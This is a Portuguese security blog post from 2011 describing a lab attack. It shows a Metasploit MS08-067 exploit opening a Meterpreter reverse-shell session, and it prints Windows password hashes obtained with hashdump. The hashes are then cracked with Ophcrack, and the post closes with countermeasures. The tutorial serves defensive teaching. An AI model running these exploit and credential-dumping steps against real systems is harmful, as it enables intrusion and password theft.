<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo.png"><img class="alignleft size-medium wp-image-2337" title="metasploit-logo" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo-300x197.png" height="197" alt="" width="300" /></a>Quando o assunto é <a href="http://blog.alexos.com.br/en.wikipedia.org/wiki/Payload_(software)">payload</a> o <a href="http://www.offensive-security.com/metasploit-unleashed/Metasploit_About_Meterpreter"> Meterpreter </a> é sem sombra de dúvidas o estado da arte. Como ele é executado na memória da vitima acaba se tornando um alvo de dificil detecção por antivírus e IPSs.</p>
<p>Ele é recheado de comandos que permitem diversas ações desde visualização das informações até controle do microfone e webcam do alvo.</p>
<p>Neste láb. irei usar o hashdump para obter o dump de senhas e farei um password brute force usando o Ophcrack. O <a href="http://ophcrack.sourceforge.net/">Ophcrack</a> é um password cracker multiplataforma livre baseado em <a href="http://en.wikipedia.org/wiki/Rainbow_table">rainbow tables</a> para quebra de senha de sistemas Windows.</p>
<p>Existem <a href="http://ophcrack.sourceforge.net/tables.php">tables gratuitas</a> no site da ferramenta, porém a tables especiais são encontradas no lado negro da força.</p>
<p><strong><br />
Vamos aos testes<br />
</strong></p>
<p>Iniciando um conexão com o Meterpreter e obtendo o dump de senhas</p>
<blockquote><p>
msf exploit(ms08_067_netapi) > exploit</p>
<p>[*] Started reverse handler on 11.11.11.11:4444<br />
[*] Automatically detecting the target…<br />
[*] Fingerprint: Windows 2003 – No Service Pack – lang:Unknown<br />
[*] Selected Target: Windows 2003 SP0 Universal<br />
[*] Attempting to trigger the vulnerability…<br />
[*] Sending stage (749056 bytes) to 11.11.11.11<br />
[*] Meterpreter session 1 opened (11.11.11.11:4444 -> 11.11.11.11:1031) at Mon Mar 28 20:41:25 -0300 2011
</p></blockquote>
<blockquote><p>
meterpreter > hashdump</p>
<p><strong>Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::</strong><br />
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br />
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:9ccce0e593125118ac7357e105e50589:::
</p></blockquote>
<p>Com o hash em mão é hora do Ophcrack fazer o trabalho sujo!</p>
<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack1.png"><img class="alignnone size-medium wp-image-2363" title="ophcrack1" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack1-300x187.png" height="187" alt="" width="300" /></a></p>
<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack21.png"><img class="alignnone size-medium wp-image-2368" title="ophcrack2" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack21-300x187.png" height="187" alt="" width="300" /></a></p>
<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack3.png"><img class="alignnone size-medium wp-image-2369" title="ophcrack3" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack3-300x187.png" height="187" alt="" width="300" /></a></p>
<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack4.png"><img class="alignnone size-medium wp-image-2371" title="ophcrack4" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/ophcrack4-300x187.png" height="187" alt="" width="300" /></a></p>
<p>Como vocês podem ver o Ophcrack levou cerca de 11 min para quebrar está senha relativamente fácil.<br />
<strong><br />
Contramedidas<br />
</strong></p>
<p>Use as seguintes medidas preventivas contra este tipo de ataque:</p>
<blockquote><p>
<strong>1 – Use senhas complexas;</p>
<p>2 – Não use somente um tipo de autenticação. Além de algo que você sabe é interessante usar algo que você tem ( e.g. token, biometria );</p>
<p>3 – Mantenha seu sistema atualizado;</p>
<p>4 – Mantenha o firewall local ativado;</p>
<p>5 – Use sistemas de proteção robustos e com checagem em tempo real da memória; </p>
<p>6 – Se você não está afim de gastar ( item 5 ) então utilize o <a href="http://www.microsoft.com/security_essentials/">MSE</a> ( Microsoft Security Essentials ) juntamente com um <a href="http://www.firewallguide.com/software.htm">firewall pessoal</a>.</strong>
</p></blockquote>
<p><strong><br />
Mais informações:<br />
</strong></p>
<p><a href="http://support.microsoft.com/kb/299656">How to prevent Windows from storing a LAN manager hash of your password in Active Directory and local SAM databases</a></p>
<p><a href="http://technet.microsoft.com/en-us/library/cc512606.aspx">Frequently Asked Questions about Passwords and Password Attacks</a></p>
<div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=2335&lang=pt-br" class="crp_title">MSF Meterpreter: Quebrando senhas do VNC</a></li><li><a href="http://blog.alexos.com.br/?p=2180&lang=pt-br" class="crp_title">Nessus Viewer</a></li><li><a href="http://blog.alexos.com.br/?p=2344&lang=pt-br" class="crp_title">Meterpreter: VNC Crack Contramedidas</a></li><li><a href="http://blog.alexos.com.br/?p=2302&lang=pt-br" class="crp_title">Usando o http-wp-plugins do Nmap para detectar plugins do WordPress</a></li><li><a href="http://blog.alexos.com.br/?p=1119&lang=pt-br" class="crp_title">Quebre senhas online ( Updated )</a></li></ul></div>
Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack
29 de Março de 2011, 0:00 - sem comentários ainda | Ninguém está seguindo este artigo ainda.
Visualizado 774 vezes
0sem comentários ainda